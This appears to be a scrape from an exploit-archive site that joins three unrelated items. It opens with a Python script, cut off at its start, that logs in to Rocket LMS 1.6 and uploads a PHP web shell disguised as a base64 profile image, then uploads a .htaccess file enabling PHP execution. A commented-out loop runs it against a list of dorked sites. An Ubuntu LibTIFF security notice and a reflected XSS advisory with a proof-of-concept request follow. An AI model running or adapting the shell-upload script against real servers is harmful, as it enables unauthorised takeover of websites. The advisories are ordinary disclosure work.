"http://"        URL = str(ssl+self.host+":"+self.port+self._url_to_login)        URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload)        csrftoken = self.get_csrf_token(client,URL)        fromt = client.get(URL)  # sets cookie              login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')        r = client.post(URL, data=login_data, cookies=client.cookies)                   self.upload_shell(client,URL2)        self.upload_htaccess(client,URL2)    def upload_shell(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)        with open(self.file,"r") as payload:            to_base64 = payload.read()                         to_base64 = str(to_base64).encode("utf-8")            base64_encoded_data=  base64.b64encode(to_base64)            base64_encoded_data = str(base64_encoded_data)[:-1]            base64_encoded_data = str(base64_encoded_data)[2:]                        string = "data:image/php;base64,"+str(base64_encoded_data)            data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")            r = client.post(URL, data=data, cookies=client.cookies)            print(r.status_code)            if r.status_code == 200:                print("sent and uploaded shell :"+URL+"\n")            else:                 print("couldn't upload shell")         def upload_htaccess(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)           string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="        data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")        r = client.post(URL, data=data, cookies=client.cookies)        print(r.status_code)        if r.status_code == 200:            print("sent and uploaded htaccess:"+URL+"\n")            print("Go and rename file in filemanager on website")        else:             print("couldn't upload htaccess") elon = Rocket(True,"localhost","443","student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")elon.login()#with dork# try:#     with open("sites.txt","r") as urls:#         url = urls.readlines()#         ssl = True#         port = 443#         for line in url:            #             try:#                 if "sslyok" in line:#                     port = 80#                     ssl = False#                 line = str(line.rstrip('%0a'))                #                 print("trying:"+line)#                 elon = Rocket(ssl,line.rstrip("\n"),str(port),"student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")#                 elon.login()#                 time.sleep(1)    #             except Exception:#                 #traceback.print_exc()#                 print("atamadim")                #             finally:#                 print("okey")# except Exception:#                 print("atamadim")

Rocket LMS 1.6 Shell Upload

Ubuntu Security Notice 5523-2 - USN-5523-1 fixed several vulnerabilities in LibTIFF. This update provides the fixes for CVE-2022-0907, CVE-2022-0908, CVE-2022-0909, CVE-2022-0924 and CVE-2022-22844 for Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. It was discovered that LibTIFF was not properly performing checks to guarantee that allocated memory space existed, which could lead to a NULL pointer dereference via a specially crafted file. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5523-2  
September 12, 2022

tiff vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in LibTIFF.

Software Description:  
- tiff: Tag Image File Format (TIFF) library

Details:

USN-5523-1 fixed several vulnerabilities in LibTIFF. This update  
provides the fixes for CVE-2022-0907, CVE-2022-0908, CVE-2022-0909,  
CVE-2022-0924 and CVE-2022-22844 for Ubuntu 18.04 LTS and  
Ubuntu 20.04 LTS.

Original advisory details:

  It was discovered that LibTIFF was not properly perf   orming checks to  
  guarantee that allocated memory space existed, which could lead to a  
  NULL pointer dereference via a specially crafted file. An attacker  
  could possibly use this issue to cause a denial of service.  
  (CVE-2022-0907, CVE-2022-0908)

  It was discovered that LibTIFF was not properly performing checks to  
  avoid division calculations where the denominator value was zero,  
  which could lead to an undefined behavior situation via a specially  
  crafted file. An attacker could possibly use this issue to cause a  
  denial of service. (CVE-2022-0909)

  It was discovered that LibTIFF was not properly performing bounds  
  checks, which could lead to an out-of-bounds read via a specially  
  crafted file. An attacker could possibly use this issue to cause a  
  denial of service or to expose sensitive information. (CVE-2022-0924)

  It was discovered that LibTIFF was not properly performing the  
  calculation of data that would eventually be used as a reference for  
  bounds checking operations, which could lead to an out-of-bounds  
  read via a specially crafted file. An attacker could possibly use  
  this issue to cause a denial of service or to expose sensitive  
  information. (CVE-2020-19131)

  It was discovered that LibTIFF was not properly terminating a  
  function execution when processing incorrect data, which could lead  
  to an out-of-bounds read via a specially crafted file. An attacker  
  could possibly use this issue to cause a denial of service or to  
  expose sensitive information. (CVE-2020-19144)

  It was discovered that LibTIFF was not properly performing checks  
  when setting the value for data later used as reference during memory  
  access, which could lead to an out-of-bounds read via a specially  
  crafted file. An attacker could possibly use this issue to cause a  
  denial of service or to expose sensitive information.  
  (CVE-2022-22844)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   libtiff-opengl                  4.1.0+git191117-2ubuntu0.20.04.4  
   libtiff-tools                   4.1.0+git191117-2ubuntu0.20.04.4  
   libtiff5                        4.1.0+git191117-2ubuntu0.20.04.4  
   libtiffxx5                      4.1.0+git191117-2ubuntu0.20.04.4

Ubuntu 18.04 LTS:  
   libtiff-opengl                  4.0.9-5ubuntu0.6  
   libtiff-tools                   4.0.9-5ubuntu0.6  
   libtiff5                        4.0.9-5ubuntu0.6  
   libtiffxx5                      4.0.9-5ubuntu0.6

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5523-2  
   https://ubuntu.com/security/notices/USN-5523-1  
   CVE-2022-0907, CVE-2022-0908, CVE-2022-0909, CVE-2022-0924,  
   CVE-2022-22844

Package Information:  
https://launchpad.net/ubuntu/+source/tiff/4.1.0+git191117-2ubuntu0.20.04.4  
   https://launchpad.net/ubuntu/+source/tiff/4.0.9-5ubuntu0.6

Ubuntu Security Notice USN-5523-2

ETAP Safety Manager version 1.0.0.32 suffers from a cross site scripting vulnerability.

    ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSSVendor: ETAP Lighting International NVProduct web page: https://www.etaplighting.comAffected version: 1.0.0.32Summary: The ETAP Safety Manager (ESM) is a central managing and controlsystem that helps you to monitor, adjust and maintain your emergency lightingsystem. Therefore each luminaire connected to your ESM network is given aunique code. The ESM can easily identify the luminaires individually andautomatically report whether all luminaires work properly. You can eitherchoose between a wired or wireless network, or a combination of both. WithESM you will not only manage your self contained or your centrally supplied‘ETAP Battery System’ (EBS) emergency luminaires’, but also DALI emergencyunits and K9 LED modules, which you can build into your luminaires. Sinceyour ESM system is connected to the Internet, you will always have accessto it through the World Wide Web. ESMweb™ is an ‘embedded web server’application for monitoring an emergency lighting system, which runs in the‘ESM web controller’. The ESMweb™ application can be accessed from any PCin the corporate network or connected to the Internet - by a standard webbrowser.Desc: Input passed to the GET parameter 'action' is not properly sanitisedbefore being returned to the user. This can be exploited to execute arbitraryHTML/JS code in a user's browser session in context of an affected site.Tested on: Apache/2.4.41 (Ubuntu)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5711Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5711.php22.08.2022--PoC:GET /json/authenticate.php?action=[XSS]&username=waddup&password=nm HTTP/1.1{"success":false,"errorMessage":"Invalid command: $","errorCode":0,"errorInfo":"\/var\/www\/etap-root\/scripts\/class.dispatch.php(39)","rows":[]}

Tag

#ubuntu